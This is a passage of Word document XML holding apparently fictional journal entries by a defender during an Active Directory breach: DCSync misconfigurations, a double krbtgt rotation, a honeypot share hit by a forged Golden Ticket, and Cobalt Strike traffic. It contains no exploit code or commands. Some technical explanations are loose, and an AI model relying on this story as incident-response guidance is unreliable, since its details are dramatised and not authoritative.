        <w:t>This catches accounts using multiple encryption types in rapid succession – a potential indicator of ticket forging or manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2EEA6" w14:textId="69909979" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
        <w:t xml:space="preserve">Third, and this is the big one: I wrote a detection for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impossible travel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> combined with Kerberos anomalies. If an account requests a TGT from one geographic location and then a service ticket from another within an impossible timeframe, it flags. Golden Tikcets can be used from anywhere, and if the attacker isn’t careful about their source IP patterns, this will for sure catch them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C0009" w14:textId="77777777" w:rsidR="00216AB6" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
        <w:t>Fourth, I set up a tarpit. I created one folder called “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Board_Materials_CONFIDENTIAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” and if that wasn’t enticing enough for </w:t>
      </w:r>
      <w:r w:rsidR="00FE1083">
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> snooping attacker, I also created a file that looks to be encrypted that says “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>hot-spouse-nuds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="005B57F3">
        <w:t xml:space="preserve">– yes, I misspelled “nudes” on purpose because no self-respecting IT professional </w:t>
      </w:r>
      <w:r w:rsidR="005B57F3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">spells anything correctly at 2 AM, and I want this to look like the authentic, sleep-deprived, typo-ridden garbage that litters every file server in America. If an attacker sees a perfectly spelled, grammatically correct folder name, they should immediately know it’s a trap. Real humans are disasters. Tasteless ones, at that. Real humans, you see, type “nuds” and don’t notice until their boss asks why there’s a folder on the corporate file server that looks like a Craigslist ad from 2004. I would know. I once sent an all-staff email with </w:t>
      </w:r>
      <w:r w:rsidR="005B57F3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘pubic</w:t>
      </w:r>
      <w:r w:rsidR="00216AB6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="00216AB6">
        <w:t xml:space="preserve">instead of </w:t>
      </w:r>
      <w:r w:rsidR="00216AB6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘public’ </w:t>
      </w:r>
      <w:r w:rsidR="00216AB6">
        <w:t>and had to pretend I was testing people’s attention to detail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58D829" w14:textId="234BD250" w:rsidR="00AB64D5" w:rsidRDefault="00216AB6" w:rsidP="00AB64D5">
      <w:r>
        <w:t>Anyhow, both folder</w:t>
      </w:r>
      <w:r w:rsidR="00FE1083">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – I’ve set up</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t xml:space="preserve"> aggressive monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that </w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t>every access attempt will log to Splunk with full user context, source IP, and file operation details. If anyone touches them,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> even blinks at it wrong,</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t xml:space="preserve"> I will know they’re not legitimate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1B085" w14:textId="12790257" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
        <w:t xml:space="preserve">I also checked the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account’s recent activities. No new logons since my discovery. That’s either good (they haven’t used it again) or terrifying (they don’t need to because they already have what they came for).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D679E9" w14:textId="4ECB492F" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
        <w:t>And finally, I ran BloodHound myself. The results made me want to throw</w:t>
      </w:r>
      <w:r w:rsidR="00FE1083">
        <w:t xml:space="preserve"> me and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> my laptop out a window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23307841" w14:textId="36402764" w:rsidR="00AB64D5" w:rsidRDefault="00E525CB" w:rsidP="00AB64D5">
      <w:r w:rsidRPr="00E525CB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5" w:rsidRPr="00E525CB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>vc-backup</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t xml:space="preserve"> isn’t the only account with DCSync rights. There’s also </w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5" w:rsidRPr="00FE1083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-ldap-sync</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t xml:space="preserve"> (a third-party identity management tool), </w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5" w:rsidRPr="00FE1083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-mim</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t xml:space="preserve"> (some MIM deployment from 2019 that nobody maintains), and – I </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>kid</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t xml:space="preserve"> you not 0 the Domain Computers group has </w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5" w:rsidRPr="00E525CB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Replicating Directory Changes All</w:t>
      </w:r>
      <w:r w:rsidR="00AB64D5">
        <w:t xml:space="preserve"> on one of the child domains. Every computer in that domain can DCSync. Every. Single. One. I think 10 years was shaved off of my lifespan from just having seen that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BF2D48" w14:textId="79BCDD15" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
        <w:t xml:space="preserve">This forest is a goddamn disaster. I’ve been here for three months and I’m finding landmines that have been buried for decades. The previous team treated Active </w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:t>Directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> like a junk drawer</w:t>
      </w:r>
      <w:r w:rsidR="00572585">
        <w:t xml:space="preserve"> – throw permissions in, never audit, hope nothing explodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B7078" w14:textId="129ED17F" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00AB64D5">
      <w:r>
        <w:t xml:space="preserve">Well, something exploded (besides my stomach). And I’m standing in the blast radius </w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:t>trying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to figure out if I’m already dead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F74B624" w14:textId="00F2911D" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00AB64D5">
      <w:r>
        <w:t xml:space="preserve">I’m rotating </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> today. Twice. I don’t care </w:t>
      </w:r>
      <w:r w:rsidR="00E525CB">
        <w:t>what</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> breaks. I’ll fix it. But I can’t leave the master key compromised while I play detective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A04DF3B" w14:textId="6B8DD17D" w:rsidR="00572585" w:rsidRPr="00E525CB" w:rsidRDefault="00572585" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E525CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 5 – 1430</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F0FD6" w14:textId="2D20DE15" w:rsidR="00572585" w:rsidRPr="00E525CB" w:rsidRDefault="00572585" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E525CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defender’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E4399D" w14:textId="7FAA09E3" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00AB64D5">
      <w:r>
        <w:t xml:space="preserve">I did it. I rotated the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password. Twice. Thought about doing three for good measure, but erred on the side of caution as everything I’ve ever read about rotating the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all say to do it twice…I wonder what would happen if I did it thrice?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F38B6A0" w14:textId="66E07E69" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00AB64D5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>My rotation process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42FE75" w14:textId="597963D4" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reset </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password to a new 128-character randomized string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58955DB1" w14:textId="7C956B2E" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Forced replication so that the password would apply right away rather than having to </w:t>
      </w:r>
      <w:r w:rsidR="0011171E">
        <w:t>wait for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the default replication interval every 90 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F306258" w14:textId="3100752A" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reset </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>again</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to another new, different 128-character randomized string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62068CD9" w14:textId="00405804" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Forced replication again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503820A" w14:textId="5A72F8E6" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">Why twice? Because of how Kerberos key versioning works, my dear friends. You see, the first reset creates a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>kvno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (key version number). But existing TGTs signed with the old </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>kvno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are still valid until they expire (up to 10 hours). The second reset ensures that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:t>outstanding tickets are invalidated because the DCs no longer have the intermediate key. It’s the only way to be certain that any stolen or forged tickets are dead in the water.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155630C7" w14:textId="560D7D60" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">The fallout was… manageable. A few service accounts that were using hardcoded old passwords for Kerberos authentication broke. One legacy application – </w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:t>so</w:t>
      </w:r>
      <w:r>
        <w:t>me inventory system from 2014 – started throwing errors. The helpdesk is fielding calls. I don’t care. I’ll fix that app tomorrow. Today, the domain is secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1182B" w14:textId="17E4F6C5" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t>Or is it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C877F9" w14:textId="131C409C" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">Here’s the thing that keeps me up at night: if the attacker forged Golden Tickets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I rotated </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, those tickets are now worthless. But what if they didn’t just forge one? What if they created multiple fake accounts, multiple ticket variants, and stored them for later use? The rotation kills the tickets, sure. But it still doesn’t tell me what they already accessed, what they possibly exfiltrated, or what persistence they established </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> those tickets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7211FF41" w14:textId="44ED0C1E" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t>I need to hunt deeper. Not just for Golden Ticket usage, but for everything that might have happened in the 48-hour window between the initial compromise and now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195DB2DE" w14:textId="3DD725CE" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t>I started with a timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3135B16C" w14:textId="03E0B57A" w:rsidR="00572585" w:rsidRPr="00413F41" w:rsidRDefault="00572585" w:rsidP="00413F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3, 0347:</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:t xml:space="preserve"> Anomalous logon on WS-ACCT-047</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3, 0351:</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:t xml:space="preserve"> svc-backup TGT requests with RC4 encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3, 0355:</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDR shows process injection, then silence</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3, 1047:</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:t xml:space="preserve"> I discover the compromise, </w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>enable logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 5, 0223:</w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Numaos" w:hAnsi="Numaos"/>
        </w:rPr>
        <w:t xml:space="preserve"> My tarpit share shows... wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9824C" w14:textId="13F8ADD5" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I just checked the tarpit share logs. Someone accessed both </w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Board_Materials_CONFIDENTIAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>hot-spouse-nuds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on November 5 at 0223. For three minutes. They browsed but didn’t copy anything. The accessing account was… </w:t>
      </w:r>
      <w:r w:rsidRPr="00413F41">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fakeuser</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B13E105" w14:textId="6A557105" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">That. Is. Not. A. Real. Account. Why I checked AD to make sure, I don’t even know at this point. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C66AE" w14:textId="2DAE2A99" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">Holy </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>ish</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. They forged a Golden Ticket. They actually did it. They created a non-existent user and used it to authenticate to my file server. And it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">worked. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Because the DC verified the ticket signature using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash, and since the hash was valid before my rotation, the ticket was accepted as legi</w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>timate</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F31626" w14:textId="009B96B4" w:rsidR="00572585" w:rsidRDefault="00572585" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">The source IP was </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>10.0.47.112</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - an IP in our guest WiFi</w:t>
      </w:r>
      <w:r w:rsidR="008469C1">
        <w:t xml:space="preserve"> range. They’re tunneling in. Probably through a compromised endpoint or rogue device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0299F" w14:textId="1D19E0FD" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I immediately cross-referenced with firewall logs. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>10.0.47.112</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> had HTTPS traffic to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>20.190.159.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – a Microsoft IP. But the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> string was wrong. It was claiming to be “</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36</w:t>
      </w:r>
      <w:r>
        <w:t>” but the TLS fingerprint didn’t match Chrome, Edge, or Firefox. It matched… Cobalt Strike’s default malleable C2 profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185FF862" w14:textId="11575291" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">They’re using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>domain fronting!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hiding their C2 traffic behind Azure CDN endpoints. That’s… that’s actually pretty good, </w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sophisticated to boot. Most attackers just blast raw TCP to their VPS. These guys are being extra careful. If I could, I would buy their whole team a drink and then slap </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>myself silly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A418B4" w14:textId="177C0012" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I ended up blocking </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>10.0.47.112</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the firewall and disabled the guest WiFi port it was using. But that’s just whack-a-mole nonsense at this point. They’ll find another way in. They already have the domain mapped better than I do. They know our topology better than I do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DE2D3" w14:textId="15471A42" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t>I need to find their persistence. If they forged a Golden Ticket, they probably also established other obfuscated backdoors. Scheduled tasks, WMI subscriptions, WinRM, service modifications, registry run keys. I’m going full on hunt now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B444F8" w14:textId="61E5590F" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">But here’s what really pisses me off: my </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rotation was the right move, but it was also a dead giveaway if they were watching folder activity or monitoring folder access and modifications to it. They know I know. And now the game drastically changes from stealth </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>to speed. They’ll try to exploit whatever access they still have before I find it all and shut them down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F69F9D" w14:textId="2E0D2A80" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I just sent an all-hands to the IR team. We’re going full incident response mode on their asses. Forensic imaging of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-ACCT-047</w:t>
      </w:r>
      <w:r>
        <w:t>, network traffic packet capturing on all DCs and a complete audit of every account with admin rights, DCSync rights, or unconstrained delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1903C" w14:textId="5B4B16D7" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t>This isn’t over. Not even close.</w:t>
      </w:r>
    </w:p>
